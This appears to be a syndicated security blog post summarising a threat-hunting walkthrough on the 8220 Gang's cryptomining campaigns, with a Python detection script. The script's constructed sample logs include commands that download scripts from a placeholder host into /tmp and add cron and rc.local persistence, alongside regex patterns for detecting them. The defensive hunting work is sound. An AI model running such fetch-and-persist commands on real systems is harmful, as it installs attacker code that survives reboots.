Learning How to Threat Hunt with the 8220 Gang

The 8220 Gang is a for-profit threat group from China that has been active since 2017, targeting cloud providers and poorly secured applications with a custom-built crypto miner and IRC bot.

While the group is considered a low-level threat group, it has continued to advance and update its campaigns over the years. The group is known for using various tactics and techniques to hide its activities and evade detection, such as using a blocklist to avoid tripping over honeypots.

Recently, SentinelOne covered the threat group in a blog post that explains how to investigate and track threats using the 8220 Gang’s activity as an example. The article is an excellent resource for new or less experienced SOC teams, analysts, and researchers who want to better understand attacker objectives and related threat intelligence.

The walkthrough in the article starts with the initial discovery of an interesting script found on a compromised AWS machine with a publicly exposed SSH service secured with weak credentials. The script (SHA1 a9da0947243333d95f84f6a0e37b9fc29b2fb054) is simple in design and built around downloading some other files and setting up persistence for them. The post then analyzes the script in detail, identifying unique additions such as the use of lwp-download combined with the destinations of its download requests.
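A small hunting heuristic in the spirit of the script analysis above, written as an added example rather than code from the SentinelOne post: it scans constructed process-audit lines for a remote download by lwp-download (or curl/wget) into a temp directory, correlates that per host with a follow-on persistence write (cron, rc.local, init scripts, SSH keys), and reports only hosts that show both. The log format, hostnames and the 198.51.100.23 address are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample process-audit lines: "<host> <pid> <command line>". Not real telemetry.
SAMPLE_LOG = """\
web-01 4411 lwp-download http://198.51.100.23/x/spirit.sh /tmp/spirit.sh
web-01 4412 bash /tmp/spirit.sh
web-01 4419 crontab -l
web-01 4420 sh -c (crontab -l; echo '*/10 * * * * /tmp/spirit.sh') | crontab -
db-02 9001 curl -sSL https://repo.example.org/pkg.tar.gz -o /opt/pkg.tar.gz
db-02 9002 tar xzf /opt/pkg.tar.gz
build-03 771 wget -q http://198.51.100.23/x/bot.pl -O /var/tmp/.b
build-03 780 sh -c echo '/var/tmp/.b &' >> /etc/rc.local
"""

# Download utilities: lwp-download is the one the post calls out; curl/wget are the usual suspects.
DOWNLOAD_RE = re.compile(r"\b(lwp-download|curl|wget)\b.*?(https?://\S+)")
# Persistence sinks. "crontab -l" alone is only a listing, so it is excluded by the lookahead.
PERSIST_RE = re.compile(
    r"(crontab\s+(?!-l\b)\S|/etc/cron\.d|/etc/rc\.local|/etc/init\.d|authorized_keys)"
)
# Droppers tend to land in world-writable temp directories; require that for a download hit.
TMP_RE = re.compile(r"(/tmp/|/var/tmp/|/dev/shm/)")


def parse(log):
    """Yield (host, pid, cmdline) tuples from the constructed log format above."""
    for line in log.splitlines():
        host, pid, cmd = line.split(" ", 2)
        yield host, int(pid), cmd


def hunt(log):
    """Return {host: {"downloads": [urls], "persistence": [cmds]}} for hosts that
    show both a remote download into a temp dir and a persistence write."""
    per_host = defaultdict(lambda: {"downloads": [], "persistence": []})
    for host, _pid, cmd in parse(log):
        m = DOWNLOAD_RE.search(cmd)
        if m and TMP_RE.search(cmd):
            per_host[host]["downloads"].append(m.group(2))
        if PERSIST_RE.search(cmd):
            per_host[host]["persistence"].append(cmd)
    return {h: v for h, v in per_host.items() if v["downloads"] and v["persistence"]}


if __name__ == "__main__":
    for host, hit in hunt(SAMPLE_LOG).items():
        print(host, hit["downloads"], len(hit["persistence"]))
```

On the sample data only web-01 and build-03 are reported; db-02 fetched a package into /opt with no persistence write, so it is left alone.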

Post-infection activity and sample pivots are also discussed. The 8220 Gang continues to use the old bash IRC bot “Tsunami” and a custom version of the open-source XMRig cryptocurrency miner called PwnRig.

The group’s repeated use of fake miner pool domains themed around the FBI is highlighted as a characteristic of the 8220 Gang. Using such themes and social engineering tactics makes their campaigns even more dangerous, as unsuspecting victims can be lured into providing access to their systems or personal information.

The infrastructure analysis in the article is particularly interesting, with the primary method of attribution being the reuse of infrastructure and the identification of newly associated infrastructure. The article explains how tracking the 8220 Gang is aided somewhat by their failures in infrastructure OPSEC: the group is not especially organized or sophisticated in managing its infrastructure. A better-organized infrastructure would make tracking the group's activities considerably harder and could lead to more successful attacks.

The 8220 Gang has been seen targeting Redis honeypots in the past. Radware previously reported on this campaign, highlighting the group’s use of fake miner pool domains and other social engineering tactics.

Using honeypots is common among security researchers to lure attackers into interacting with simulated systems and gather intelligence on their methods.

In conclusion, the post provides a straightforward understanding of the 8220 Gang's use of malicious scripts, malware samples, and malicious infrastructure, making it a valuable resource for those looking to monitor and analyze malware samples, identify patterns in malicious scripts, and map out infrastructure. It is critical to remain vigilant and aware of such threats, especially for organizations with sensitive data or cloud-based operations. Regularly monitoring and analyzing network traffic and system logs can help detect and prevent attacks before they cause significant harm.

The post Learning How to Threat Hunt with the 8220 Gang first appeared on PKTZ.

*** This is a Security Bloggers Network syndicated blog from PKTZ authored by pktzadmin. Read the original post at: